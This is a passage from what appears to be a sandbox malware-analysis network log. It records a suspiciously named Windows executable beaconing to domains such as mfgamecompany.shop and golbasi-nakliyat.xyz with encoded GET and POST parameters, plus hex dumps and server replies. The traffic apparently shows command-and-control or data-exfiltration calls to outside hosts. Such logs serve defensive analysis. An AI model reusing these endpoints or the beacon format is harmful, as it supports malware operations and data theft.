                                        Data Raw: 4f 6c 54 58 65 3d 65 7a 47 4a 78 39 62 65 50 2f 56 77 41 2b 56 6f 48 31 59 61 41 76 47 67 36 6e 4a 2b 6b 46 45 74 41 57 31 4e 61 31 75 65 66 78 71 58 4e 77 58 6d 69 39 35 70 34 6e 37 6d 78 44 79 32 52 35 66 44 2f 63 75 33 48 76 4f 77 44 62 71 54 4f 61 72 56 42 4d 52 71 53 59 51 62 53 50 46 64 30 79 55 53 33 4b 4f 74 52 71 41 47 34 7a 59 6e 55 77 52 76 49 6c 55 55 4a 51 37 75 41 37 4d 42 45 54 56 31 43 74 6f 6d 50 6d 76 45 6f 4b 32 56 4c 43 33 42 55 69 34 62 7a 38 68 48 5a 39 61 68 61 63 34 6d 2b 77 62 46 52 79 55 4a 6c 77 59 75 55 58 2b 2b 56 55 71 66 62 43 43 5a 48 41 76 43 73 66 50 35 33 48 65 6d 66 6b 6f 63 6c 39 33 65 58 67 4b 76 61 71 30 6d 71 69 6a 53 70 7a 56 61 57 2b 37 78 67 36 5a 53 44 56 6d 41 65 59 61 6f 6d 76 34 54 49 44 45 67 53 64 34 48 32 78 46 34 43 64 5a 4b 6a 2f 71 74 6b 78 76 5a 61 4d 37 47 73 47 74 74 46 35 2f 46 61 6d 43 35 68 55 38 44 50 38 67 4b 76 43 31 64 51 7a 4b 4b 67 43 42 76 75 74 34 41 6b 67 49 38 7a 36 47 38 36 2f 4b 44 73 76 48 64 49 39 45 79 69 56 31 2b 77 68 68 41 [TRUNCATED]
                                        Data Ascii: OlTXe=ezGJx9beP/VwA+VoH1YaAvGg6nJ+kFEtAW1Na1uefxqXNwXmi95p4n7mxDy2R5fD/cu3HvOwDbqTOarVBMRqSYQbSPFd0yUS3KOtRqAG4zYnUwRvIlUUJQ7uA7MBETV1CtomPmvEoK2VLC3BUi4bz8hHZ9ahac4m+wbFRyUJlwYuUX++VUqfbCCZHAvCsfP53Hemfkocl93eXgKvaq0mqijSpzVaW+7xg6ZSDVmAeYaomv4TIDEgSd4H2xF4CdZKj/qtkxvZaM7GsGttF5/FamC5hU8DP8gKvC1dQzKKgCBvut4AkgI8z6G86/KDsvHdI9EyiV1+whhAruMgWBY8/FLVSXqzu3viE8qaqG1QFuT5JYjKVWCvdNZxYUbbdfyP+bla8+akOlE3jEZWlyQSvP8NhOu3d1zFZNl9LCoOcAoy65aYwohJBMts4BnK9kmpHmC2ZTHHtmJVyVNqxcnmnZ7d58OMYf2BUXNa+EmaMSsVhruVvR3tgBnzwQ1wocM4N08Z/WEup6kfo8V1JHDSoEFPsCJVfa4O2WOnS3NnsJRRrHBN1cleuNRvRguER/EXJ44OGCPrYbRN+gf6HLQ//UZOWVCAdFrDw6YmQ2/Wi50onxD9YO03oPp1izUiNcp7XSDJurhhgXdLgQSXKpe1/PePzV+x0M5j3+v+GuZFtrpGU1QqmalU7V8H0lzfvkddq9SKBMWyH9JKdgF08S8uaxY1ZR+cgsDTUGG+pU5GKKzjSovrUbQZy0ScL4leBczegi+I9ox81Xu6ZGkfykUIasnxHM/CKdut0vNLT8Uyml3Q7EfwhnJlYP20SHOdZdYSFsNNhEoRkTsPhhmmhcy4GRsjiENCq8jrBL2jby9qVfVs6b1wSQKuYHNZQTRWBA+GcKae4jkQTvWQ0Lp+bjQIKZQLrU8g5GGFxi9ZYrC5EzU3+P1IR1aOfhz1PJ4eI7xdBbSeNKZmTsJGRrYJCO0Jb423U5rP3YU0N3QHauNhgax0aI [TRUNCATED]
                                        Sep 11, 2024 10:10:08.480945110 CEST1700OUTData Raw: 51 45 4d 63 44 54 70 31 6d 37 57 5a 32 4f 79 31 34 38 6e 59 78 53 49 4c 4d 7a 47 31 66 66 41 57 7a 75 68 43 52 39 4b 79 38 77 4f 4c 57 4c 64 4c 4c 51 6e 43 7a 49 48 64 63 46 74 79 33 36 5a 48 33 33 52 71 70 64 70 68 65 38 4f 33 67 6e 34 2f 63 74
                                        Data Ascii: QEMcDTp1m7WZ2Oy148nYxSILMzG1ffAWzuhCR9Ky8wOLWLdLLQnCzIHdcFty36ZH33Rqpdphe8O3gn4/ctAe0/1HMAMd+5XYg++wz495K9z6fmBrgwrZMMtGxcAPvlm39MNmwXN7wbKy8gQzYlAo6GK28C3gh7gtCGVWdQnbZAS1wjni8UaP85Pn5nPEz2RMisJb5BuWFOMjGZ9qT7o0qMrkY78BaiNsB7T0aF8ICG+hxgxAjGL


                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                        13192.168.2.224917485.159.66.93801544C:\Program Files (x86)\FeFOaLgjviRnzJvbQecOwkXLjqfdrklFEEtiMeHyMpfUBgLMxLsHpsOrLvQVtglctYVPXGT\xONxwdydvq.exe
                                        TimestampBytes transferredDirectionData
                                        Sep 11, 2024 10:10:11.019891977 CEST464OUTGET /k2vl/?OlTXe=TxupyKnRMohPPcJUOS0MXPimpk4F304dGmgAGE+PRAnDIVDTmPtylWW9xTGIc+3DzvKXbunYVpmmYdbvcJ53VYYaSs8c8gEur6KMZZBX2lUDNg59LBcCd3WrENlZ&th=XXRlJ2 HTTP/1.1
                                        Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
                                        Accept-Language: en-US,en
                                        Host: www.golbasi-nakliyat.xyz
                                        Connection: close
                                        User-Agent: Mozilla/5.0 (Linux; Android 4.4.2; C6725 Build/KVT49L) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/44.0.2403.133 Mobile Safari/537.36
                                        Sep 11, 2024 10:10:11.711606026 CEST225INHTTP/1.1 404 Not Found
                                        Server: nginx/1.14.1
                                        Date: Wed, 11 Sep 2024 08:10:11 GMT
                                        Content-Length: 0
                                        Connection: close
                                        X-Rate-Limit-Limit: 5s
                                        X-Rate-Limit-Remaining: 19
                                        X-Rate-Limit-Reset: 2024-09-11T08:10:16.6015079Z


                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                        14192.168.2.2249175185.173.111.76801544C:\Program Files (x86)\FeFOaLgjviRnzJvbQecOwkXLjqfdrklFEEtiMeHyMpfUBgLMxLsHpsOrLvQVtglctYVPXGT\xONxwdydvq.exe
                                        TimestampBytes transferredDirectionData
                                        Sep 11, 2024 10:10:16.766618967 CEST2472OUTPOST /lwt6/ HTTP/1.1
                                        Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
                                        Accept-Encoding: gzip, deflate, br
                                        Accept-Language: en-US,en
                                        Host: www.mfgamecompany.shop
                                        Origin: http://www.mfgamecompany.shop
                                        Referer: http://www.mfgamecompany.shop/lwt6/
                                        Content-Type: application/x-www-form-urlencoded
                                        Connection: close
                                        Content-Length: 2162
                                        Cache-Control: max-age=0
                                        User-Agent: Mozilla/5.0 (Linux; Android 4.4.2; C6725 Build/KVT49L) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/44.0.2403.133 Mobile Safari/537.36
                                        Data Raw: 4f 6c 54 58 65 3d 75 39 31 5a 44 65 78 76 6c 4e 4b 48 4a 4a 55 5a 79 41 37 67 33 65 57 53 31 78 79 55 76 33 5a 74 30 2b 37 6e 50 78 6b 42 2b 4a 6c 45 6a 46 34 37 61 57 74 7a 47 2b 72 54 68 34 61 76 57 31 42 72 2f 36 76 65 44 4d 65 46 44 7a 65 6b 47 61 5a 37 43 4b 52 30 47 6d 34 32 78 47 44 32 44 66 49 67 37 6c 67 54 66 4d 4b 4f 42 57 35 50 4b 6e 62 4c 56 66 4a 67 4b 66 70 67 6e 51 54 73 66 68 6e 42 35 6e 62 72 4b 75 34 33 43 43 69 31 56 73 46 68 47 70 4c 61 64 37 50 34 6b 70 58 4c 64 48 6e 48 69 57 6c 53 73 72 4b 2b 43 38 63 39 7a 38 69 74 74 6f 72 5a 4e 67 78 5a 65 46 65 30 34 48 50 34 49 51 2f 50 53 56 5a 39 30 73 75 55 46 4e 54 68 59 65 39 37 51 35 32 30 53 76 4b 75 50 70 36 6f 43 30 4b 2f 62 6a 75 4e 42 68 4d 46 47 31 4f 77 68 76 67 4e 70 6e 4a 38 49 56 74 78 66 49 30 55 49 56 52 51 6e 47 4d 36 51 30 48 77 73 4b 53 30 2f 61 6b 4e 35 63 67 37 58 53 77 2f 79 62 32 31 67 39 58 57 2f 33 6d 31 76 37 75 45 75 6b 4e 63 77 45 61 77 4e 6c 6a 33 6a 56 52 71 33 2f 42 36 2f 73 49 79 51 6e 4b 4a 4d 2b 72 67 [TRUNCATED]
                                        Data Ascii: OlTXe=u91ZDexvlNKHJJUZyA7g3eWS1xyUv3Zt0+7nPxkB+JlEjF47aWtzG+rTh4avW1Br/6veDMeFDzekGaZ7CKR0Gm42xGD2DfIg7lgTfMKOBW5PKnbLVfJgKfpgnQTsfhnB5nbrKu43CCi1VsFhGpLad7P4kpXLdHnHiWlSsrK+C8c9z8ittorZNgxZeFe04HP4IQ/PSVZ90suUFNThYe97Q520SvKuPp6oC0K/bjuNBhMFG1OwhvgNpnJ8IVtxfI0UIVRQnGM6Q0HwsKS0/akN5cg7XSw/yb21g9XW/3m1v7uEukNcwEawNlj3jVRq3/B6/sIyQnKJM+rgHA53EglwdFt6Pjf8Ex1cqIrpI1TUsx6wtyg+6RPjY01E9hUCEmFzgMtcSel+RDkatiMhBDh3a7iLXB1i73h4j4VTuGt3A9lDWtTaOX+INtxmw3zhi21ohY8L1IC8T/N3dO7Yw03cINjRJcKQ6+taqKa2zrigi78IwVyjkK0YNhKvJKG04rxDI9UBMH+kJVeuXJvljUcroLG8OUFwDH1ZhXAFUNC2jDc6cJmKB4Ben9ThXoAPsQT5E+bPihQhF/HF+rLyh4KwSKCO7SDcIufjH9GISVsxfWRo4HJ80kRf4jh0OqpqNLYcDIsaHZxhu2vU9TcD2s825WL4vHi/XZRqtduqheQuIoUiFahCSUOMsVqvuEjK2wcVQMLXrA9kNybO762hJEFfvyY9YXs78tT1qHq0zK6hj5N184huBEuU/N2pu2d3zz4gwStlFHmXpc3qidNlVOFIe1YwGWfinQKKRmg1I+b85Nh31zQIYC3YIVhYXox2K8xhWfBzyK5UcBERdH2otHuCjQjpi2ZbRCguSKfwsh7+822PMDQOVUqtwwBiJtpYfphS3a1dYr+ZZVthralEx+MV5UY6gZHIWY8/8HC4y8JHREpoZX5ZTbaNlQZrdjwTHSBR65wyOXQy8S5L2bXxD89X31ne7aRctQL0vFIm3wqFyQ45W5 [TRUNCATED]
                                        Sep 11, 2024 10:10:16.775419950 CEST230OUTData Raw: 49 47 78 34 75 5a 55 46 72 52 39 32 69 6d 62 4b 48 6e 50 35 38 71 50 7a 45 6b 49 4d 4d 36 48 79 6c 56 79 50 33 66 37 6f 6a 4a 74 49 6a 67 44 58 62 42 69 54 58 4c 2b 31 6a 74 66 6a 38 49 4c 39 56 71 38 6e 55 36 78 51 36 32 70 4a 77 75 4e 47 41 6b
                                        Data Ascii: IGx4uZUFrR92imbKHnP58qPzEkIMM6HylVyP3f7ojJtIjgDXbBiTXL+1jtfj8IL9Vq8nU6xQ62pJwuNGAkk6gXlW5cyTMMaCPvq4addK0Gu36R71P5if1T3C/ula6bOEx6iH3Wu/Cvc3QzFdY3q1bg94SuvrnheCxEeSDg5M+RwnK12KdIb2/WDoqPKRyG81ULUZOAlCExCtxE50gH14oS302xiyA9csGNteiS
                                        Sep 11, 2024 10:10:17.453175068 CEST1086INHTTP/1.1 301 Moved Permanently
                                        Connection: close
                                        content-type: text/html
                                        content-length: 795
                                        date: Wed, 11 Sep 2024 08:10:17 GMT
                                        server: LiteSpeed
                                        location: https://www.mfgamecompany.shop/lwt6/
                                        platform: hostinger
                                        panel: hpanel
                                        content-security-policy: upgrade-insecure-requests
                                        Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 73 74 79 6c 65 3d 22 68 65 69 67 68 74 3a 31 30 30 25 22 3e 0a 3c 68 65 61 64 3e 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 73 68 72 69 6e 6b 2d 74 6f 2d 66 69 74 3d 6e 6f 22 20 2f 3e 0a 3c 74 69 74 6c 65 3e 20 33 30 31 20 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 0d 0a 3c 2f 74 69 74 6c 65 3e 3c 73 74 79 6c 65 3e 40 6d 65 64 69 61 20 28 70 72 65 66 65 72 73 2d 63 6f 6c 6f 72 2d 73 63 68 65 6d 65 3a 64 61 72 6b 29 7b 62 6f 64 79 7b 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 23 30 30 30 21 69 6d 70 6f 72 74 61 6e 74 7d 7d 3c 2f 73 74 79 6c 65 3e 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 20 73 74 79 6c 65 3d 22 63 6f 6c 6f 72 3a 20 23 34 34 34 3b 20 6d 61 72 67 69 6e 3a 30 3b 66 6f 6e 74 3a 20 6e 6f 72 6d 61 6c 20 31 34 70 78 2f 32 30 70 78 20 41 72 69 61 6c 2c [TRUNCATED]
                                        Data Ascii: <!DOCTYPE html><html style="height:100%"><head><meta name="viewport" content="width=device-width, initial-scale=1, shrink-to-fit=no" /><title> 301 Moved Permanently</title><style>@media (prefers-color-scheme:dark){body{background-color:#000!important}}</style></head><body style="color: #444; margin:0;font: normal 14px/20px Arial, Helvetica, sans-serif; height:100%; background-color: #fff;"><div style="height:auto; min-height:100%; "> <div style="text-align: center; width:800px; margin-left: -400px; position:absolute; top: 30%; left:50%;"> <h1 style="margin:0; font-size:150px; line-height:150px; font-weight:bold;">301</h1><h2 style="margin-top:20px;font-size: 30px;">Moved Permanently</h2><p>The document has been permanently moved.</p></div></div></body></html>


                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                        15192.168.2.2249176185.173.111.76801544C:\Program Files (x86)\FeFOaLgjviRnzJvbQecOwkXLjqfdrklFEEtiMeHyMpfUBgLMxLsHpsOrLvQVtglctYVPXGT\xONxwdydvq.exe
                                        TimestampBytes transferredDirectionData
                                        Sep 11, 2024 10:10:19.318605900 CEST741OUTPOST /lwt6/ HTTP/1.1
                                        Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
                                        Accept-Encoding: gzip, deflate, br
                                        Accept-Language: en-US,en
                                        Host: www.mfgamecompany.shop
                                        Origin: http://www.mfgamecompany.shop
                                        Referer: http://www.mfgamecompany.shop/lwt6/
                                        Content-Type: application/x-www-form-urlencoded
                                        Connection: close
                                        Content-Length: 202
                                        Cache-Control: max-age=0
                                        User-Agent: Mozilla/5.0 (Linux; Android 4.4.2; C6725 Build/KVT49L) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/44.0.2403.133 Mobile Safari/537.36
                                        Data Raw: 4f 6c 54 58 65 3d 75 39 31 5a 44 65 78 76 6c 4e 4b 48 4a 4f 41 5a 7a 55 76 67 78 4f 57 53 34 52 79 55 31 48 59 6f 30 2f 48 52 50 31 38 52 39 34 68 45 6a 51 63 37 61 6c 46 7a 54 2b 72 51 35 49 62 6b 53 31 42 45 2f 36 76 6f 44 4f 61 46 44 33 32 6b 48 2f 56 37 53 2b 6c 37 46 57 34 30 34 6d 44 31 44 66 45 54 37 6b 63 44 66 4d 69 4f 42 51 35 50 4c 6e 4c 4c 52 36 39 67 4f 76 70 6d 76 77 53 75 66 68 71 62 35 6e 4c 7a 4b 75 6f 33 42 77 47 31 4d 64 6c 68 44 36 6a 61 55 62 50 35 77 5a 57 6b 54 47 4f 57 76 6b 31 64 75 4e 32 47 50 39 73 34 33 74 47 6a 6c 4b 58 48 42 54 46 6a 57 51 66 48 78 55 32 4b 65 67 3d 3d
                                        Data Ascii: OlTXe=u91ZDexvlNKHJOAZzUvgxOWS4RyU1HYo0/HRP18R94hEjQc7alFzT+rQ5IbkS1BE/6voDOaFD32kH/V7S+l7FW404mD1DfET7kcDfMiOBQ5PLnLLR69gOvpmvwSufhqb5nLzKuo3BwG1MdlhD6jaUbP5wZWkTGOWvk1duN2GP9s43tGjlKXHBTFjWQfHxU2Keg==
                                        Sep 11, 2024 10:10:19.979223967 CEST1086INHTTP/1.1 301 Moved Permanently
                                        Connection: close
                                        content-type: text/html
                                        content-length: 795
                                        date: Wed, 11 Sep 2024 08:10:19 GMT
                                        server: LiteSpeed
                                        location: https://www.mfgamecompany.shop/lwt6/
                                        platform: hostinger
                                        panel: hpanel
                                        content-security-policy: upgrade-insecure-requests
                                        Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 73 74 79 6c 65 3d 22 68 65 69 67 68 74 3a 31 30 30 25 22 3e 0a 3c 68 65 61 64 3e 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 73 68 72 69 6e 6b 2d 74 6f 2d 66 69 74 3d 6e 6f 22 20 2f 3e 0a 3c 74 69 74 6c 65 3e 20 33 30 31 20 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 0d 0a 3c 2f 74 69 74 6c 65 3e 3c 73 74 79 6c 65 3e 40 6d 65 64 69 61 20 28 70 72 65 66 65 72 73 2d 63 6f 6c 6f 72 2d 73 63 68 65 6d 65 3a 64 61 72 6b 29 7b 62 6f 64 79 7b 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 23 30 30 30 21 69 6d 70 6f 72 74 61 6e 74 7d 7d 3c 2f 73 74 79 6c 65 3e 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 20 73 74 79 6c 65 3d 22 63 6f 6c 6f 72 3a 20 23 34 34 34 3b 20 6d 61 72 67 69 6e 3a 30 3b 66 6f 6e 74 3a 20 6e 6f 72 6d 61 6c 20 31 34 70 78 2f 32 30 70 78 20 41 72 69 61 6c 2c [TRUNCATED]
                                        Data Ascii: <!DOCTYPE html><html style="height:100%"><head><meta name="viewport" content="width=device-width, initial-scale=1, shrink-to-fit=no" /><title> 301 Moved Permanently</title><style>@media (prefers-color-scheme:dark){body{background-color:#000!important}}</style></head><body style="color: #444; margin:0;font: normal 14px/20px Arial, Helvetica, sans-serif; height:100%; background-color: #fff;"><div style="height:auto; min-height:100%; "> <div style="text-align: center; width:800px; margin-left: -400px; position:absolute; top: 30%; left:50%;"> <h1 style="margin:0; font-size:150px; line-height:150px; font-weight:bold;">301</h1><h2 style="margin-top:20px;font-size: 30px;">Moved Permanently</h2><p>The document has been permanently moved.</p></div></div></body></html>


                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                        16192.168.2.2249177185.173.111.76801544C:\Program Files (x86)\FeFOaLgjviRnzJvbQecOwkXLjqfdrklFEEtiMeHyMpfUBgLMxLsHpsOrLvQVtglctYVPXGT\xONxwdydvq.exe
                                        TimestampBytes transferredDirectionData
                                        Sep 11, 2024 10:10:21.862953901 CEST2472OUTPOST /lwt6/ HTTP/1.1
                                        Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
                                        Accept-Encoding: gzip, deflate, br
                                        Accept-Language: en-US,en
                                        Host: www.mfgamecompany.shop
                                        Origin: http://www.mfgamecompany.shop
                                        Referer: http://www.mfgamecompany.shop/lwt6/
                                        Content-Type: application/x-www-form-urlencoded
                                        Connection: close
                                        Content-Length: 3626
                                        Cache-Control: max-age=0
                                        User-Agent: Mozilla/5.0 (Linux; Android 4.4.2; C6725 Build/KVT49L) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/44.0.2403.133 Mobile Safari/537.36
                                        Data Raw: 4f 6c 54 58 65 3d 75 39 31 5a 44 65 78 76 6c 4e 4b 48 50 71 38 5a 79 7a 44 67 6d 65 57 52 39 52 79 55 76 33 5a 76 30 2b 37 52 50 78 6b 42 2b 4c 4e 45 6a 48 77 37 61 47 74 7a 55 4f 72 51 2f 49 61 76 57 31 42 73 2f 2b 47 54 44 4d 43 2f 44 78 6d 6b 47 65 46 37 43 4c 52 30 51 32 34 32 75 57 44 30 44 66 45 61 37 6b 4e 4b 66 4d 33 72 42 51 68 50 4c 52 66 4c 58 4b 39 6a 54 66 70 6d 76 77 53 71 66 68 71 37 35 6b 36 75 4b 76 73 6e 43 42 57 31 56 38 46 68 42 5a 4c 64 41 72 4f 79 75 4a 58 46 64 48 37 36 69 57 6b 56 73 72 32 59 43 38 67 39 7a 71 75 74 74 72 44 61 47 51 78 61 51 6c 65 30 6c 58 50 36 49 51 2f 70 53 56 5a 39 30 76 36 55 45 64 54 68 59 63 56 38 66 5a 32 30 62 50 4b 70 42 4a 47 57 43 30 33 59 62 69 2f 77 42 33 41 46 46 33 57 77 6c 66 67 4e 72 58 4a 2b 49 56 74 47 55 6f 30 32 49 52 39 70 6e 47 64 6e 51 30 48 77 73 4d 47 30 37 4a 4d 4e 36 4d 67 37 56 53 77 36 37 37 32 32 67 38 47 6d 2f 33 53 31 76 36 6d 45 76 54 78 63 34 6d 43 2f 47 31 6a 32 6e 56 52 6f 67 76 42 56 2f 73 56 5a 51 6e 44 65 4d 2f 62 67 [TRUNCATED]
                                        Data Ascii: OlTXe=u91ZDexvlNKHPq8ZyzDgmeWR9RyUv3Zv0+7RPxkB+LNEjHw7aGtzUOrQ/IavW1Bs/+GTDMC/DxmkGeF7CLR0Q242uWD0DfEa7kNKfM3rBQhPLRfLXK9jTfpmvwSqfhq75k6uKvsnCBW1V8FhBZLdArOyuJXFdH76iWkVsr2YC8g9zquttrDaGQxaQle0lXP6IQ/pSVZ90v6UEdThYcV8fZ20bPKpBJGWC03Ybi/wB3AFF3WwlfgNrXJ+IVtGUo02IR9pnGdnQ0HwsMG07JMN6Mg7VSw67722g8Gm/3S1v6mEvTxc4mC/G1j2nVRogvBV/sVZQnDeM/bgHGt3LlZwd1t5XTf4AxJAqITHI1Xus3qwsjg+5SngUk1G2BUUAmEdgNZ+Sbp+R34asjshFyhwbLjDTB15yXhkj4RxuH9nAMVDM9TaKyiJSNxj+Xz35m16hY811JiGTNd3dNzYwircINjWcsKS0uoPqKGyzr+wi5kIxFCjkL0YHhKvDqH8xLw+I50RMDu0JlKuWrHluyIrurGyMUFxeX0JhRgFUPOmjAc6fsKKDapemNSmL4AqsQT1E+fDihAfF63F+qLyxJKwbqCN5SDYFOfAH9e+SW5kfXZo5j58nFRf5DhhMqpqYbY6DIksHYtxu0DU9nYDnc8xjGL3tHi+BZR0tdeqheMuIp8iFt1CWlOMjFqpw0jQ8QBCQKrbrAV0N0DO6vChOGtcjiY7dXt64tSqqHrmzO+xjLF19tVuCmGX3N2kkWdk3z5RwS9+FGS9prnqic9lU9tIeFYwGWftnQKORnchI7fW5Nh31iQIYxfYQlgcbIxXO8w8WfNRyKh6cBoRdTiotHuNtAjq4GZcRCtMSKfSskj+pU6PdBYOVyet3QBiMdpbWJhR3a1NYvuJZQBhxLFE9doSm0Zdp5Hgc4g88HOwy4RHRX9obFBZTraN7gZqFzwGJydN65scOWAi9m1LkcbxB/FW4lndkKRetQWEvFA93xDyyTI5RZ [TRUNCATED]
                                        Sep 11, 2024 10:10:21.868042946 CEST1694OUTData Raw: 73 47 78 38 79 5a 55 43 58 52 39 6d 69 6c 53 61 48 6d 42 5a 38 74 47 54 45 34 49 4d 4e 4c 48 77 77 43 79 4e 37 66 38 39 6e 4a 72 35 6a 67 41 6e 62 4c 31 44 58 55 70 6c 76 7a 66 6a 67 45 4c 35 52 63 39 57 30 36 6a 53 53 32 73 37 59 75 48 47 41 6e
                                        Data Ascii: sGx8yZUCXR9milSaHmBZ8tGTE4IMNLHwwCyN7f89nJr5jgAnbL1DXUplvzfjgEL5Rc9W06jSS2s7YuHGAnuagGlW01yQllaDeCrKydc60GjVSeqlP/yP0R3C/GlaCHOEtqiGfWu8qvNXQwTdY1mVal94eDvruweGdEeTfg4sOR5HK1z6dNY2+KNIuOKRr/nEQIb+a5pWBBBNlz2Epx+Lwg8lvtgRUEAYWwo7L7hnl1UAnmAeMEM
                                        Sep 11, 2024 10:10:22.511239052 CEST1086INHTTP/1.1 301 Moved Permanently
                                        Connection: close
                                        content-type: text/html
                                        content-length: 795
                                        date: Wed, 11 Sep 2024 08:10:22 GMT
                                        server: LiteSpeed
                                        location: https://www.mfgamecompany.shop/lwt6/
                                        platform: hostinger
                                        panel: hpanel
                                        content-security-policy: upgrade-insecure-requests
                                        Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 73 74 79 6c 65 3d 22 68 65 69 67 68 74 3a 31 30 30 25 22 3e 0a 3c 68 65 61 64 3e 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 73 68 72 69 6e 6b 2d 74 6f 2d 66 69 74 3d 6e 6f 22 20 2f 3e 0a 3c 74 69 74 6c 65 3e 20 33 30 31 20 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 0d 0a 3c 2f 74 69 74 6c 65 3e 3c 73 74 79 6c 65 3e 40 6d 65 64 69 61 20 28 70 72 65 66 65 72 73 2d 63 6f 6c 6f 72 2d 73 63 68 65 6d 65 3a 64 61 72 6b 29 7b 62 6f 64 79 7b 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 23 30 30 30 21 69 6d 70 6f 72 74 61 6e 74 7d 7d 3c 2f 73 74 79 6c 65 3e 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 20 73 74 79 6c 65 3d 22 63 6f 6c 6f 72 3a 20 23 34 34 34 3b 20 6d 61 72 67 69 6e 3a 30 3b 66 6f 6e 74 3a 20 6e 6f 72 6d 61 6c 20 31 34 70 78 2f 32 30 70 78 20 41 72 69 61 6c 2c [TRUNCATED]
                                        Data Ascii: <!DOCTYPE html><html style="height:100%"><head><meta name="viewport" content="width=device-width, initial-scale=1, shrink-to-fit=no" /><title> 301 Moved Permanently</title><style>@media (prefers-color-scheme:dark){body{background-color:#000!important}}</style></head><body style="color: #444; margin:0;font: normal 14px/20px Arial, Helvetica, sans-serif; height:100%; background-color: #fff;"><div style="height:auto; min-height:100%; "> <div style="text-align: center; width:800px; margin-left: -400px; position:absolute; top: 30%; left:50%;"> <h1 style="margin:0; font-size:150px; line-height:150px; font-weight:bold;">301</h1><h2 style="margin-top:20px;font-size: 30px;">Moved Permanently</h2><p>The document has been permanently moved.</p></div></div></body></html>


                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                        17192.168.2.2249178185.173.111.76801544C:\Program Files (x86)\FeFOaLgjviRnzJvbQecOwkXLjqfdrklFEEtiMeHyMpfUBgLMxLsHpsOrLvQVtglctYVPXGT\xONxwdydvq.exe
                                        TimestampBytes transferredDirectionData
                                        Sep 11, 2024 10:10:24.392992020 CEST462OUTGET /lwt6/?OlTXe=j/d5AuZ+qvKLIrA4zUrVw+2CrkvGu2Abkvu2bg8Q1qFMmFYyV0FqVOqh+5a/W0db1sjnIOHkeiKnBLtde7l1JWY97ka7LeQptngAefCJEWxKZG7LUP9THac9rEGk&th=XXRlJ2 HTTP/1.1
                                        Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
                                        Accept-Language: en-US,en
                                        Host: www.mfgamecompany.shop
                                        Connection: close
                                        User-Agent: Mozilla/5.0 (Linux; Android 4.4.2; C6725 Build/KVT49L) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/44.0.2403.133 Mobile Safari/537.36
                                        Sep 11, 2024 10:10:25.061925888 CEST1227INHTTP/1.1 301 Moved Permanently
                                        Connection: close
                                        content-type: text/html
                                        content-length: 795
                                        date: Wed, 11 Sep 2024 08:10:24 GMT
                                        server: LiteSpeed
                                        location: https://www.mfgamecompany.shop/lwt6/?OlTXe=j/d5AuZ+qvKLIrA4zUrVw+2CrkvGu2Abkvu2bg8Q1qFMmFYyV0FqVOqh+5a/W0db1sjnIOHkeiKnBLtde7l1JWY97ka7LeQptngAefCJEWxKZG7LUP9THac9rEGk&th=XXRlJ2
                                        platform: hostinger
                                        panel: hpanel
                                        content-security-policy: upgrade-insecure-requests
